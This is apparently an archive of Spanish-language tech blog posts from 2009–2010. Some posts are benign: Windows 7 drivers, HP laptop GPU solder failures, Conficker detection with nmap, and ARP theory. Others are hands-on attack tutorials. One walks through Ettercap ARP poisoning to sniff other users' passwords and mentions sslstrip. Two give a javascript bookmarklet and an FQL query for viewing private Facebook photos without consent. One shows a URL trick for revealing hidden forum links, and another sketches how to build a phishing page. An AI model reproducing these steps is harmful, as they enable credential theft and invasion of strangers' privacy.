la red esta llena d personitas preguntando "como hackear passwords de hotmail" y lleno d otras tantas q ponen tutos en los q hacen 1 simple envenenamiento y activan el sniffer mostrando resultados con passwords d hotmail, gmail, yahoo, etc. lo cierto es q c puede hacer, pero no es tan facil y se requiere hacer alguna cosa mas.

las passwords no c transmiten todas del mismo modo, no es lo mismo el login d 1 ftp q el d hotmail x ej donde entra en juego encriptacion ssl, intercambio d certificados, etc., para ver s tipo d contraseñas necesitamos hacer algun paso adicional.

hasta no hace mucho la tecnica acostumbrada era enviar al navegador 1 certificado falso, el cual muestra el tipico mensaje d q el certificado no es valido. como el 90% (si no mas) d los users simplemente lo aceptan y siguen su camino c podria decir q tiene bastante efectividad...

sin embargo el año pasado c presento en el black hat dc 2009 la tecnica llamada sslstrip. lo q hace basicamente es reescribir todos los links https a http, despues reconstruye las urls con 1 certificado valido y redirige la conexion hacia su destino original despues d quedarse con los datos... sin alertas, sin llamar la atencion d nadie... perfecto xD

sniffing/poisoning basico

como dije q era practica dejo las explicaciones d lado y vamos a ver el tipico tuto d ettercap (sin errores ni omisiones) q sirve para capturar passwords en texto plano. esto es ftp, telnet, foros e infinidad d paginas, sitios e intranets q no usan encriptacion en los logins.

hay versiones d ettercap tanto para win como para linux, obviamente c recomienda linux para este tipo d "actividades". la instalacion del programa no tiene demasiadas complicaciones. para win c puede descargar d aca (la version q dice win32.exe):

http://sourceforge.net/projects/ettercap/files/

en linux desde el gestor d paquetes o:

http://ettercap.sourceforge.net/download.php

en win abre directamente en modo grafico en linux desde la consola en modo root (o con sudo) ejecutar "ettercap -G".

c abre la ventana del programa, seleccionamos el menu SNIFF -> UNIFIED SNIFFING...

se abre la ventana d seleccion del dispositivo d entrada, en mi caso ath0, si estuviera en red cableada seria el eth0... simplemente seleccionen su dispositivo conectado a la red.

cambia el menu superior, seleccionamos HOSTS -> SCAN FOR HOSTS...

esto corre 1 scanneo en la red para ver q hay conectado...

hacemos click en HOSTS -> HOSTS LIST en este caso salen 3 ips. 2 son pcs conectadas a la red y la 3era el router. lo q tenemos q saber es cual es la ip del router y la de la pc a envenenar.

para saber cual es el router en windows hacemos 1 ipconfig desde la consola y la ultima linea (gateway o "puerta d enlace predeterminada") es la ip del router.

en linux, desde la consola "ip route show" y sale tambien en la ultima linea (default via).

la maquina a envenenar ya deberian saberla o averiguarla, para eso c puede usar 1 scanner o simples ping -a en win para saber el nombre, nbtstat, etc. mmblookup, dig o lo q sea en linux.

en este caso el router es el 192.168.0.254 y la pc a envenenar la 192.168.0.101. seleccionamos la 254 y hacemos click en "add to target 1", despues seleccionamos la 101 y hacemos click en "add to target 2". en la consola inferior del programa se ve el log con los cambios que vamos haciendo.

seleccionamos el menu MITM -> ARP POISONING y en la ventana q sale checkeamos "SNIFF REMOTE CONNECTIONS" y aceptar.

ya esta corriendo el envenenamiento, d manera q todo el trafico entre 101 y 254 pasa por nosotros, ahora queda activar el sniffer para capturar. menu START -> START SNIFFING

solo queda esperar a q alguien meta 1 password para q salga en la parte inferior.

este metodo como dije solo sirve para contraseñas de texto plano, en la proxima entrada voy a poner el uso practico de certificados falsos y d sslstrip combinados con esto.

ahhh... las conversaciones d msn viajan en texto plano x si a alguien le interesa, activando ettercap junto con wireshark c pueden ver... tal vez lo explique con mas detalle tambien en el futuro pero no c si vale la pena 1 entrada... es bastante facil agregandolo a lo anterior ;)

como ver fotos privadas en facebook (otra vez...) v2010

2010-04-26T18:38:00.010-03:00

no paso ni 1 año desde q c conocio el famoso bug del fql.query (hacer click aca) q tardaron meses en "solucionar" (?) y ya hay formas todavia mas sencillas d poder ver las fotos d los perfiles sin agregar ni aceptar o lo q sea q hagan para verlas en esas estupidas redes.

en este poco tiempo c multiplico la cantidad d phishing, spam y todo tipo d basura informatica. hace unos dias lei q estaban a full con 1 q avisaba q las claves habian sido modificadas y pedia hacer click en 1 adjunto (xD) para renovacion. obviamente el adjunto super infectado con todo lo q c puedan imaginar.

solo queda hacer algunos calculos, teniendo en cuenta q la red tiene unos 400 millones d usuarios, no hace falta q mucho porcentaje haga click... digamos q con 1% ya tenemos info d 4 millones. esos 4 millones seguramente no son muy lucidos ya q cayeron, asi q seguramente tendran tambien todo tipo d info sensible guardada en el sistema. si solo un 1% tenia datos bancarios tendriamos... 40000? je... mas q suficiente.

para los delincuentes informaticos (y no hackers q son 2 cosas bien distintas) es 1 olla d oro sin nadie q la cuide, pero... q c les puede decir a los pobres incautos q siguen en estas redes? ya es como q "lo necesitan"... hasta en el celu ultimamente xD

el metodo

el metodo... xq eso es lo q quiere la mayoria para ver las fotos d algun user q no los acepta o alguna d esas cosas q sacan el sueño a mas d 1. tal vez alguno reflexione y c d cuenta q hay vida fuera d facebook y q pueden conocer gente en la vida real como c hizo durante miles d años xD

1. loguearse en facebook

2. ir al perfil d la persona q quieran ver las fotos

3. copiar el siguiente codigo en la barra d direcciones:

javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');
tab_controller.changePage("photos");})()

4. presionar enter ;)

como conseguir drivers para windows 7

2010-03-01T22:15:00.009-03:00

hace unas semanas tuve que reinstalar una compaq f756 que viene con el aborrecible windows vista y x supuesto se me ocurrio pasarla a 7, q si bien sigue sufriendo la mayoria d las maldiciones d windows tiene una performance muchisimo mejor q el anterior.

la 1era vez que instale 7 fue alguna beta en una maquina virtual d vmware asignandole solo 1 nucleo y 512mb d memoria, para mi sorpresa corria muy bien con tan pocos recursos, por lo que podriamos decir q el sistema es capaz d funcionar en cualquier hardware q soporte vista (y mucho menos tambien) sin el mas minimo problema.

en este caso hablamos d 1 laptop con 2gb d ram, micro turionX2 a 1.9ghz y video Nvidia Gforce 7000m. viene d fabrica con vista, el cual le da segun su sistema de benchmarking (o como c llame lo q hace para testear el hard) 2.1 puntos. la maquina es lo suficientemente nueva como para cualquier sistema, pero... pero... yendo a buscar los drivers a la pag d HP:

http://h10025.www1.hp.com/ewfrf/wc/softwareCategory?product=3653215&lc=en&cc=us&dlc=en&lang=en&cc=us

era obvio no? no hay soporte... je

el negocio del hard, los drivers, etc

sin embargo a la izquierda d la pagina encontramos 1 link q dice "Information about Windows 7 software and drivers", lo cual nos puede llegar a dar esperanzas... x supuesto hasta ver el link solamente.

Ahi podemos leer q "HP esta actualmente testeando y calificando soft y drivers para win 7 para los modelos listados en la siguiente tabla" (obviamente no esta la f756), y sigue con q "este proceso no sera completado antes d la liberacion d win 7 antes del 22.10.09". ni c habla entonces d liberar oficialmente drivers para este modelo.

mmmm... xq? no lo soporta? tiene algun problema? tan dificil es?? nah... mejor q la tiren y compren otra maquina "windows 7 ready" seguramente piensan los genios d marketing d HP.

el negocio cuando salio vista era q para correrlo habia q tener 1 pc monstruo. como el user final quiere tener lo ultimo (aunque no sabe ni para q) fue record la venta d laptops, desktops, clones y lo q sea q pudiera correr 1 vista. ahora como la vieja maquina sobra para correr 7 la complican x el lado d los drivers...

sin embargo, como los drivers c pueden conseguir aunque HP no los entregue siempre hay quien saca provecho del problema d los demas y lo convierte en $$, como x ej estos sres q venden los drivers d win7 para el modelo d compaq en cuestion:

http://restore-disk.com/restoredisks/HP/HPCompaq/HP-Compaq-Presario-F756NR-Windows-7-Restore-Disk-315147.html

y a 11.44€!! me imagino q para los europeos seran monedas pero aca en argentina no es tan barato y en otros paises latinoamericanos debe ser una fortuna casi.

entonces... como puede ser q un 3ero venda los drivers para 1 equipo q el propio fabricante dice q no soporta el sistema??

en fin... esto no es propio d HP sino d la mayoria d las marcas, hace un rato estaba leyendo en 1 foro d asus quejas d los usuarios al respecto. lo q pasa es q otra vez c me cruzo hp/compaq en el medio d mis problemas... je

la solucion

antes d hacer el pasaje estuve googleando un poco y vi mucha gente con problemas para hacer el pasaje a 7 en la f756, drivers d la cam, video, problemas d reinicios, etc. la solucion q use yo es bien facil y c puede aplicar a cualquier equipo:

1. backupear los drivers d vista con cualquier soft para dicho proposito. x ej drivermax:

http://www.innovative-sol.com/drivermax/

2. instalar 7

3. buscar en el admin d dispositivos los drivers q faltan (en mi caso eran solo 2 o 3) y mandar al sistema a buscarlos en la carpeta q guardamos con los drivers d vista.

4. driver d video en la pag d nvidia, ati, o la q corresponda.

5. disfrutar d tu win7.

con este metodo la maquina levanto todos los dispositivos sin problemas y x supuesto quedo hecha 1 avion a comparacion d como iba con el vista. ahhh y el sistema d puntuacion le da 3.0 a la misma maquina xD

entonces... xq no liberan los drivers en lugar d dejar q los venda cualquiera x ahi? si todos sabemos q funciona. bah... no c xq no me cayo la boca y mejor me hago yo tambien 1 web d venta d drivers para win7 xDD

conclusion

los drivers d vista en su mayoria funcionan con windows 7. simplemente hagan backup o descarguen el d vista d la web del fabricante.

para finalizar dejo los links a las paginas d descarga d drivers para 7 d las principales marcas:

Windows 7 Laptop / Notebook Drivers

Windows 7 Graphic & Sound Cards Drivers

Windows 7 Printer & Scanner Drivers

problema con notebooks. hp, nvidia, el plomo y blah blah blah

2009-12-16T20:29:00.010-03:00

esta vez parece q le toco a hp. la verdad q es 1 lastima xq siempre me parecio d las mejores marcas y personalmente nunca tuve ningun problema, la razon principal debe ser q no tengo 1 portatil hp/compaq... jeje

cada vez c hace mas dificil d ocultar el problema q hay con modelos d los ultimos 2/3 años d hp q se arruinan en tiempo record, las laptops c juntan x pilas en los negocios d reparacion y a pesar d q muchas paginas, blogs, foros, etc q publican este problema desaparecen "milagrosamente" la verdad ya esta a la vista. fallas d diseño, el problema del plomo y 1 empresa q no c hace cargo d sus errores.

ademas, como siempre mucho tecnico llenandose d plata pasando reparaciones x "cambio d mother" o cosas parecidas ;)

en realidad este problema seguramente c extiende a muchos otros artefactos (algo parecido pasa en la xbox360) como fue en su momento el problema d los capacitores, pero en las hp c dieron unos cuantos factores q ayudaron a q sea mas notable.

cual es entonces el problema principal?... x problema principal me refiero a lo q hace q la maquina deje d funcionar en principio ya q problemas hay muchos. la temperatura q levantan estas laptops es 1 problema aunque sigan funcionando, a menos q la quieran usar para hacer huevos fritos. bueno, el problema entonces...

soldaduras sin plomo

el plomo es malo para el ser humano, hasta ahi estamos d acuerdo. por normativas anticontaminacion muchos paises no permiten el uso d plomo en las soldaduras, d modo q c usa 1 aleacion especial d estaño sin plomo q para empezar no resiste las mismas temperaturas q el estaño normal. la diferencia es suficiente como para causar problemas en los contactos d 1 chip gpu (graphics processing unit... en castellano: el cpu d la placa d video).

estos chips c sueldan con el sistema "bga". este proceso consiste en colocar unas bolitas d estaño en el chip q despues x medio d calor c sueldan a la placa. hay varios procesos para lograrlo pero basicamente es eso. obviamente tambien c puede hacer con estaño normal, lo cual no causaria este problema.

el plomo es malo para el ser humano pero es bueno para los chips, estoy a favor d la ecologia y todo eso, pero me parece q tendrian q apuntar a otro lado, reciclar mejor las cosas o si eso es imposible x lo menos buscar 1 sustituto q sea igual d bueno o mejor... o no c... diseñar algo q no c rompa en 2 meses d uso cuando cuesta los usd q vale 1 laptop.

el problema

el sintoma tipico en las hp es q no muestran video aunque se puede ver q la maquina enciende y carga normalmente. al parecer, combinado con el tema del estaño hay 1 problema con ciertos modelos d nvidia q elevan demasiado la temperatura y no termina ahi sino q parece q ademas, x 1 falla d diseño en algunos modelos... el chip no hace contacto con el disipador... sin palabras... 1 verguenza.

esto x supuesto hace q la triste soldadura sometida a tal calor empiece a fallar y deje d hacer contacto con la placa con el resultado anterior.

los modelos afectados son muchisimos, entre ellos estan las series:

dv2000
dv5000
dv6000
dv9000
v2000
v3000
v6000
tx1000

y vaya a saber cuantos mas, estos son los mas conocidos.

la respuesta d hp

debido a q tenian q hacerse cargo d alguna manera la respuesta fue el "HP Pavilion dv2000/dv6000/dv9000 and Compaq Presario v3000/v6000 Series Notebook PCs - HP Limited Warranty Service Enhancement":

http://h10025.www1.hp.com/ewfrf/wc/document?docname=c01087277&lc=en&cc=us

1 extension d la garantia y 1 upgrade para la bios. upgrade q lo q hace es acelerar los fans y c dice x ahi q bajar el voltaje, con lo cual estamos practicamente underclockeando y x supuesto jugando con la estabilidad del equipo.

en el caso d poder enviar el equipo para reparacion la solucion d hp es cambiar el mobo, con lo cual el problema sigue, lo unico q c hace es volverlo a 0. con el tiempo el equipo va a volver a calentar y otra vez las soldaduras van a fallar. y suerte si lo hacen gratis, sino el cambio d 1 mobo cuesta entre 400 y 500usd.

hay gente iniciando juicios y otras cosas, pero como todos sabemos no c le puede ganar a las grandes corporaciones xq tienen miles d abogados esperando para comernos las entrañas.

la solucion

mmmm... la solucion definitiva seria hacer 1 reballing del chip (con estaño con plomo... je) y x supuesto buscar la manera d q disipe mejor ya q tampoco es muy comodo trabajar con 1 equipo q levanta esas temperaturas.

como para el reballing hacen falta maquinas especiales y bastantes $$ (o mucho ingenio y muñeca) hay montones d soluciones alternativas. la principal consiste en usar 1 pistola d calor sobre el chip elevando la temperatura hasta 300ºC en algunos casos, para fundir la soldadura y presionando cuidadosamente restablecer el contacto. hay unos cuantos videos x ahi d como hacer el proceso. en el del link q sigue c puede ver en 1 v3000:

http://www.youtube.com/watch?v=i2z2FqZusjY

el problema con este "sistema" es q la soldadura sigue siendo 1 porqueria y va a pasar lo mismo en 1 par d meses. es importante refrigerar d alguna manera para q no vuelva a generarse tanto calor.

en s tema llegue a ver cosas como poner 1 moneda d cobre entre el chip y el "disipador" (pasta termica mediante) para q justamente haya 1, ya q todos sabemos q si no hay contacto no hay donde mandar el calor y c lo va a comer todo el chip. esto combinado con cosas como hacer agujeros en la parte inferior hasta convertirla en 1 colador, y hasta 1 q decia x ahi q le ponia 1 barra d hielo debajo xDD

conclusion

es lamentable xq como decia al principio la consideraba una d las mejores marcas, pero no compren laptops hp. por lo menos hasta q quede claro q esta solucionado este problema. la garantia a la q me referia antes llega hasta la dv9400 y ya es sabido q modelos posteriores tienen el mismo problema.

parece q esta gente no tiene muchas ganas d solucionarlo y el usuario moderno esta mas acostumbrado a tirar las cosas a la basura y comprar 1 nueva, no es la gente d hace 10 o 20 años q conocia su maquina y la apreciaba, hoy todo es descartable... y la verdad q no me importaria comprar 1 cada 6 meses si costaran 100 o 200usd pero como todos sabemos no es asi.

Como ver links ocultos en foros smf

2009-06-17T11:45:00.008-03:00

no tengo idea d smf asi q esto va a ser bien basico... je

hace unas semanas me di cuenta d este fallo (o mala configuracion, xq no c bien lo q es) y no le hice mucho caso pensando q era conocido, pero hablando x ahi me di cuenta q parece q no mucha gente lo sabe y me decidi a publicarlo.

todos nos encontramos alguna vez con el famoso:

Necesitas ser usuario para ver los enlaces Crear Usuario o Hacer Sesion

o tal vez:

You are not allowed to view links. Register or Login

q los admins suelen poner en sus foros para generar mas altas d usuario, obligandolos a tener 1 cuenta para ver el contenido, y asi parecer 1 comunidad gigante, cuando muchas d estas en realidad tienen unos pocos cientos d users activos y el resto son miles d "fantasmas" q solo entran a descargar warez o porno.

es cierto q no es demasiada molestia hacerse 1 user, sobre todo si no pide confirmacion d correo, y si la pide tenemos alternativas como:

http://www.10minutemail.com

q nos permiten usar 1 cuenta falsa q c autodestruye a los 10mins. pero... a veces estamos buscando algo y resulta molesto andar dandose d alta en 10 lugares distintos para q despues los links no sirvan, tener q ir a otro lado a hacer la misma historia y perderse todo el dia creando cuentas q despues no usamos jamas...

como dije antes no tengo idea d smf asi q estuve preguntando x ahi y me explicaron q la funcion se realiza x medio d 1 mod, ya q no existe en el sistema (si en vbulletin), el mas popular al parecer es reglinks:

http://custom.simplemachines.org/mods/index.php?mod=342

no tengo idea si el problema es del mod, d todos los mods q hacen esto, o d mala configuracion x parte del admin, pero la falla c encuentra en la mayoria d los foros smf x lo q estuve viendo... vamos al grano... je

Ver los links ocultos

c van a reir cuando vean lo facil q es... casi hasta me da verguenza hacer 1 entrada con esto... :P

abran la pag del tema donde esta el link oculto y presionen el boton "imprimir" o "printpage"... miren bien... si si, el link ya no esta oculto XD

algun admin mas inteligente q los demas seguramente habra hecho desaparecer el boton, pero no asi la funcion "printpage" x lo q solo tendriamos q injectarla en la url.

x ej supongamos q tenemos:

foro.xxxxxxx.com/index.php/topic,1234.0

deberiamos agregarle el "action=printpage". quedaria asi:

foro.xxxxxxx.com/index.php?action=printage;topic=1234.0

y produce el mismo resultado q el boton. en unos pocos foros no funciona x lo q vi... y en vbulletin no funciona directamente.

tambien es visible en el source d la pagina en algunos bajo el tag "visibility:hidden" pero en otros no. sin importar esto ultimo el printpage funciona en ambos.

es todo lo q tengo x ahora... el "como" pero no el "xq". si alguien q lea esto tiene idea le agradeceria q aclare 1 poco el tema... y al q no le interesa "el xq", simplemente usenlo mientras funcione y evitense d andar creando tanto usuario fantasma ;)

Facebook, Hi5 y las redes sociales... virus, bugs y criminales "no tan virtuales."

2009-06-02T14:14:00.004-03:00

Fuck!! Es q no le importa a la gente q todos esten viendo su intimidad? Conocen el concepto d “privacidad”? Leyeron (o vieron aunque sea) 1984? Saben adonde nos va a terminar llevando esto?? Mmm... no me lo quiero ni imaginar xq asusta. xD

Hoy dia es muy facil encontrar datos d personas simplemente xq ellos los ponen a la vista d todos. Cualquiera con conocimientos minimos puede ponerse a buscar gente y averiguar cosas sobre ellos con la unica herramienta d 1 conexión a internet. Esto no seria tan malo si vivieramos en 1 mundo perfecto donde todos son buenos y nadie quiere sacar provecho del otro, robar, matar, y violar todas las p... leyes, mandamientos o lo q sea, pero el caso es q no vivimos en 1 mundo asi y no c entiende como es posible q no abran los ojos.

La masividad d internet llevo a estas cosas, antes c cuidaba mucho mas la privacidad en la red, para empezar xq el usuario medio tenia 1 nivel mucho mas alto que hoy, ademas d q habia mas conciencia del problema y mas ganas d educar a la gente sobre como comportarse en su vida virtual. Siempre me acuerdo d 1 comercial d los 90´s en el q habia 2 perros chateando (irc x supuesto... je) y 1 le decia al otro “en internet nadie sabe q somos perros”. 1 imagen muy significativa x cierto, q tal vez hoy parezca mas obvia pero en realidad los hechos demuestran q no lo es tanto para muchos.

En esa epoca no tan lejana, poco mas d 10 años, el user leia mas los msgs q le entregaba el sistema o el mismo browser, en lugar d presionar “aceptar” a cualquier virus q anda x ahí como pasa hoy, pero el tema tambien esta en q a muchos les interesa justamente q la gente sea como es, para q? para tenerla bajo control x supuesto... je

Gusanos, phishing, malware y otros bichos...

Empecemos con el tema d los virus... hay 1 flia d gusanos (boface) hecho específicamente para la red facebook. No es gran cosa ni obra d 1 genio del codigo, pero debido a la masividad d la red y a los pocos conocimientos en gral d sus users c calculan los infectados en millones.

Según datos d panda activescan, 1 herramienta gratuita d scanneo online, c calcula q en los ultimos meses un 1% d las pcs q paso x ahí esta infectado con alguna d las variantes de boface. Se dice q hay 200 millones d users en facebook... solo hay q hacer cuentas para ver lo gordo y grande q esta el gusano ;)

La ultima versión llamada boface.bj c descarga en la pc x los medios habituales y entra en accion cuando el user d la pc infectada c loguea en su cuenta. Manda links a su “red d amigos” con 1 supuesto video d youtube (en realidad la url dice yuotube... jeje) q al querer ejecutar pide la descarga d 1 reproductor q en realidad es 1 d esos falsos antivirus q lanzan ventanas todo el tiempo pidiendo q lo compren... y lo peor es q muchos lo terminan comprando...

Esto x supuesto no es cosa d “hackers”. Hasta me acuerdo d haber visto 1 herramienta x ahí q automatizaba la creación d la pag falsa... “fake youtube” o algo asi c llamaba. La verdad q no me acuerdo xq lo vi d pasada y hace bastante tiempo. Cualquier niño puede armar 1 phisher similar con esto.

Otro peligro es justamente el phishing, no voy a ponerme a explicar la tecnica, pero ademas d tambien haber herramientas para crear los fakes, son muy faciles d hacer a mano, solo descargar la pagina original, apuntar el action a 1 simple php d no mas d 10 lineas, guardar user/pass y redireccionar a la pag verdadera. Con esto c obtienen mas passes y con ellos mas victimas para la infeccion o lo q sea.

X supuesto q ya no es el hecho d la infeccion xq si, sino con fines economicos y a veces no tan “inofensivos” como vendernos 1 falso anti-algo. Es bien sabido (y sino enterense) q los criminales del mundo real (vulgares ladrones o secuestradores) usan estas redes para obtener info d sus victimas como costumbres, modo d vida, nivel socioeconomico, relaciones, etc... la vieja y siempre valida “ingenieria social” a la orden del dia...

Muchos diran mi perfil es privado, blah blah blah, etc. Y eso seria aunque sea una ayuda si en verdad estas redes fueran seguras, pero x ej hay 1 bug en facebook hace ya meses q nadie parece parchar (vaya a saber xq) con el cual c pueden ver los albumes privados d quien queramos.

Ver fotos sin permiso en facebook

Este bug, q en realidad no es 1 bug sino 1 falta d atención x parte d la gente d facebook, es muy facil d explotar, cualquiera q pueda hacer copy/paste esta capacitado... je. Lo voy a explicar xq en realidad es algo bastante lamer, pero me parece 1 verguenza q nadie c preocupe x arreglarlo en tanto tiempo, sobre todo teniendo en cuenta la amenaza a la seguridad y privacidad d los users d la red en cuestion. Tal vez cuando hasta el ultimo d los internautas sepa ya como hacerlo c decidan a parcharlo... :/

Los pasos serian los siguientes:

1. abrir nuestra cuenta d facebook. O hacerse 1 cualquiera x supuesto ;)

2. entrar a: http://developers.facebook.com/tools.php

3. en el menu desplegable “metodo” seleccionar “fql.query”

4. completar el campo “query” con:

SELECT location, link
FROM album
WHERE owner=xxxxxxxxxx

Donde xxxxxxxxxx es el id del usuario del q queremos ver sus albumes sin estar agregados.

El query nos devuelve en el cuadro d la derecha 1 serie d datos entre los cuales c encuentran las urls d los albumes. Algo parecido a esto:

<album>
<location/>
<link> http://www.facebook.com/album.php?aid=xxxxx& amp; id=xxxxxxxxxx </link>
</album>

Tomamos el link y le sacamos el “amp;”, con lo q quedaria asi:

http://www.facebook.com/album.php?aid=xxxxx&id=xxxxxxxxxx

Ponganlo en el navegador y... bingo!!! Ya estan juackeando gente... xD

Al dia d hoy esto sigue funcionando después d meses, hasta el propio creador d facebook fue victima del bug y sus fotos privadas estan dando vueltas x toda la red. Ademas d q... x supuesto cualquier criminal q sepa apretar 2 botones tambien esta viendo info privada del q quiere para saber q le puede robar o como lo puede engañar.

C siguen sintiendo seguros? No les importa? Solo googleen 1 poco para buscar info sobre criminales usando facebook para obtener datos d sus victimas... c van a asustar.

La privacidad es algo muy importante y q hay q guardar muy bien, 1 mundo donde la vida d cada persona c puede encontrar en 1 base d datos publica no es nada seguro ya q la información es poder, poder para controlar a los demas, y el q tenga control sobre la bd tiene control d 1 forma u otra sobre esas personas ya q conoce su vida y todo lo q hace... la vieja historia del “big brother” pero real y en versión sXXI.

Nmap vs Conficker??

2009-05-12T09:56:00.008-03:00

Creo q a esta altura ya todos habran oido hablar d Conficker, el gusano d moda en la red… xD. La principal via d propagacion del mismo es la vulnerabilidad MS08-067 q c soluciona con el parche KB958644 que se puede descargar como siempre desde la pagina de Microsoft:

http://www.microsoft.com/downloads/en/results.aspx?pocId=&freetext=KB958644&DisplayLang=en

... aunque tambien esta presente la propagacion x usb y algun otro metodo, el parche es el 1er paso para evitar la reproducción del gusano en la red. En 1 equipo hogareño la desinfección es bastante facil, pero en 1 red corporativa la cosa c complica 1 poco mas.

No voy a entrar demasiado en detalle sobre la accion del Conficker ya q abunda info y no es el tema central, pero si dar algunos consejos para ayudar a limpiar la red infectada. Las acciones pueden llevar desde la mas extrema, q es poner en cuarentena la red y limpiar estaciones d trabajo y servers, hasta metodos mas sutiles, q llevan mas tiempo pero no comprenden paralizar completamente la red. Hay q tener en cuenta q no siempre es posible paralizar 1 empresa aunque sea 1 solo dia...

En el 1er caso, la desconexion d las pcs d la red impide la reinfeccion y el tema seria bastante facil. Desinfectar con cualquiera d las herramientas gratuitas d av q andan x internet, aplicar parche y x las dudas scannear otra vez hasta limpiar el total d las maquinas.

La 2da opcion queda a criterio d quien este encargado d la red ya q según su extensión podria llevar varios dias. El 1er paso como siempre es parchar las pcs, q x otro lado ya deberian estar hace rato xq la actualizacion c libero en octubre d 2008, y ahí justamente tenemos el 1er punto para resaltar.

Es normal q 1 user hogareño no tenga sus pcs actualizadas al dia pero es casi imperdonable q 1 red corporativa no tenga 1 actualizacion d hace 6 meses, tal vez esto ayude a q los admins no sean tan negligentes con estas cosas y den mas importancia a las actualizaciones. D este punto c agarra Microsoft para lavarse las manos del asunto... “yo saque mi actualizacion... vos no la bajaste... tu culpa” xD

Otro punto q ayuda a parar la infeccion es cerrar el puerto 445 en las pcs. Este puerto c encarga del directory service (Microsoft-ds) y es el q usa el gusano. Esto puede hacerse x regla del mismo firewall d win o tal vez x el mismo antivirus si tiene opcion d blockeo d puertos. Desde la controla central c puede agregar la politica a los clientes y cerrar rapidamente esa via d infeccion.

Tambien podemos deshabilitarlo borrando el siguiente valor del registro:

HKLM\System\CurrentControlSet\Services\NetBT\Parameters\TransportBindName

Despues d esto, como en el caso anterior limpiar el sistema con alguna utilidad y x supuesto actualizar el av local q probablemente no lo estaba haciendo.

Otra consecuencia del virus es q si existe en la red 1 politica d blockeo d passwords en X intentos fallidos, muchas d las cuentas apareceran blockeadas constantemente ya que trata de crackear x medio d fuerza bruta passwords del sistema para seguir la propagacion.

La versión C entre otras “mejoras” instala 1 falso parche 958644 q aparenta ser el d Microsoft y d hecho repara la vulnerabilidad pero contiene 1 backdoor para futuras reinfecciones, x lo cual podriamos pensar q 1 maquina esta limpia y parchada cuando no lo esta realmente...

Nmap

A partir d la versión 4.85b5 nmap puede detectar remotamente maquinas infectadas, lo cual facilita muchisimo el trabajo, ya q x lo gral las consolas d av son demasiado lentas y generar 1 informe para cientos d maquinas para tener 1 panorama claro lleva tiempo, ademas del proceso d comunicación entre el cliente y el servidor, y las molestias en la red q ocasiona el gusano.

Con nmap en unos pocos mins tenemos los resultados bastante claros en 1 scan completo d la red. El comando para scannear buscando Conficker seria el siguiente:

nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [rango ip]

el resultado en 1 cliente limpio seria “Conficker: Likely CLEAN” y en 1 infletado “Conficker: Likely INFECTED”. Ademas de mostrar el estado d los puertos 139 y 445.

Algo todavía mas interesante es scannear tambien en busca del parche. Lo cual hacemos cambiando el ultimo modificador x unsafe:

nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args unsafe=1 [rango ip]

en 1 pc parchada el resultado seria “MS08-067: FIXED”, y en 1 q no lo esta “MS08-067: VULNERABLE”.

Pero eso no es todo, ya q cabe tambien la posibilidad d q el parche sea el generado x el gusano y esto tambien es posible verlo en el scanneo. El resultado seria “MS08-067: PATCHED (possibly by Conficker)”. En este caso el parche es falso. Hay q desinstalarlo, scannear e instalar el verdadero.

A pesar d q mucha gente d IT mira despectivamente al nmap como 1 herramienta d “hackers” creo q no hay forma mas rapida d tener 1 informe claro del grado d infección y x lo tanto erradicarla lo mas rapido posible.

Descarga d nmap:

http://nmap.org/download.html

no tengan miedo... usenlo!!! xD

ARP Poisoning

2009-03-19T21:18:00.009-03:00

Este ataque tan d moda esta bastante explicado en la parte d la puesta en practica, se pueden encontrar x toda la red tutoriales con titulos como “Como hackear contraseñas de Hotmail, Gmail, etc” o “Sea juacker en 3 rapidas lecciones”, con capturas d pantalla e instrucciones paso a paso d como sniffar redes, hacer ataques mitm, etc. Eso si... lo unico q c explica es “abri esto”, hace click alla, después en el otro lado... y asi... je

Lo q no esta tan explicado es la teoria, en consecuencia hay cantidad d gente x ahí mandando paquetes arp sin saber mucho d lo q hacen realmente... y aunq consigan su objetivo, siempre es bueno saber como y xq funcionan las cosas.

Para los q quieren enterarse 1 poco voy a tratar d explicar d manera facil d entender como funciona el tema. Proximamente en otra entrada, para no ser menos, 1 poco d practica con Ettercap o Cain.

ARP, NIC, MAC... y todo eso…

Como todos sabemos el dispositivo d red tiene 1 direccion IP (Internet Protocol) q es la q lo diferencia d los demas y nos brinda la forma d ubicarlo dentro d la red. La ip es unica e irrepetible y blah blah blah... hasta ahí llegamos con eso xq c supone q saben lo q es 1 IP. Para el q no lo sepa q empiece leyendo aca:

http://es.wikipedia.org/wiki/Direcci%C3%B3n_IP

IP es 1 sistema bastante bueno en muchos sentidos pero tiene el problema d q las direcciones pueden ser tanto estaticas como dinamicas y las estaticas tambien pueden ser cambiadas en algun momento... las dinamicas, según el leasing q otorgue el DHCP d nuestra red y la cantidad d peticiones, podriamos llegar a desconectar el cable y tener 1 nueva direccion al reconectar... como entonces podemos reconocer 1 dispositivo sin temor a equivocarnos?

Ahí entra en juego la MAC (Media Access Control). 1 dispositivo d red tiene 2 direcciones, la IP (d la q hablábamos), y la MAC, q es la dirección física, la cual tambien es unica para cada dispositivo o NIC (Network Interface Card).

La MAC viene d fabrica grabada en 1 chip, a diferencia d la IP q es asignada ya sea x DHCP o el SO, y “teóricamente” es imposible d cambiar. Digo teóricamente xq en la practica no lleva mucho + q 3 o 4 clicks en win y 1 linea d consola en *nix. X supuesto q sigue teniendo la misma dir y es el SO el q emula 1 distinta, aunque para todo efecto se cambio y la vieja ya no existe en la red, pero eso es otro tema...

Esta dirección esta compuesta x 6 campos d 1 byte d longitud (FFh) d los cuales los 3 1eros corresponden al fabricante y son asignados x la IEEE Standards Association. Este codigo es llamado OUI (Organizationally Unique Identifier) y se puede consultar en esta dirección:

http://standards.ieee.org/

los ultimos campos son la identificación unica del dispositivo, la cual queda a criterio del fabricante.

Como c puede ver la MAC es algo mucho + estatico q la IP y x lo tanto tiene la desventaja d no poderse ordenar en rangos o subredes como podemos hacer fácilmente con las IPs. Ademas d q una MAC no es routeable y x lo tanto no sirve para protocolos d internet, solamente comunicación d hardware a nivel d red local, x esa razon todos estos ataques sirven solamente en 1 LAN (Local Area Network) o “red local”... perfecto para empresas, escuelas, etc.

Lo unico q nos faltaria ahora para identificar “sin temor a confundirnos” 1 dispositivo es poder asociar 1 direccion con la otra y para eso tenemos justamente el protocolo ARP (Address Resolution Protocol).

ARP

En la capa física de la red solo tenemos NICs q c comunican unos con otros a traves d su MAC. Para llegar a esto, como deciamos anteriormente, necesitamos asociar la dirección IP (d la capa d red) con la MAC address. D eso justamente c ocupa el protocolo ARP.

